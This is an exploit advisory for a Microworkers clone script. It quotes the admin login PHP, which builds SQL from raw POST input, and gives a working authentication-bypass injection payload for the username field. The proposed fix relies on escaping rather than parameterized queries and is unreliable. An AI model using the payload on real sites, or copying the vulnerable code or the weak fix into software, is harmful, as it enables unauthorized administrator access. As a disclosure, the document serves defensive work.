`=============================================================
Microworkers clone script by: Annexwaretexolution ( http://www.annexware.com/ )
Official site seems down for now alternatively you can find this script in eg from here:
http://clonesite.do.am/load/0-0-1-163-20
or from google.
=============================================================
Microworkers clone script by: Annexwaretexolution ( http://www.annexware.com/ ) is prone to SQL injection vulnerability.
=============================================================
Vuln Desc:
While online penetration testing this script i managed to find SQL injection vulnerability in it which leads to Auth Bypass without knowing valid password for administrator account.
Here we go:
//administrator/loginshed.php
======================Vulnerable Code Section:=====================
<?php
include('../settings/config.php');
$username= $_POST["username"];
$password= $_POST["password"];
$sql="SELECT * FROM `adminlogin` WHERE `username`='".$username."' and `password`= '".base64_encode($password)."' ; ";
$res=dbQuery($sql) or die(mysql_error().$sql);
$rec=dbNumRows($res);
if($rec > 0)
{
$s = dbQuery("update `adminlogin` set `logintime`= '".$totaldate."' where `username`='".$username."' ; ");
$_SESSION["adminusername"]=$username;
header("location: adminhome.php");
}
else
{
header("location: index.php?msg=error");
}
?>
==================EOF Vulnerable Code Section:=========================
======================GPC=OFF====================================
Exploit:
Login: admin'or''='
Password:whateveryouwant
==================================================================
Fix:
Open administrator/loginshed.php and replace variables:
$username= $_POST["username"];
$password= $_POST["password"];
with this:
$username= mysql_real_escape_string(htmlentities($_POST["username"]));
$password= mysql_real_escape_string(htmlentities($_POST["password"]));
================================================================
[+]Vendor notified about issuse.
================================================================
[-]No Dork for scriptkiddiez.
================================================================
+++++++++My Sincerely Thanks to:+++++++++++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
to all AA Team + to all Azerbaijan Black HatZ + Especially to my bro CAMOUFL4G3.
++++++++++++++++++++++++++++++++++++++++++++++++
Respect && Thank you.
/AkaStep ^_^
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation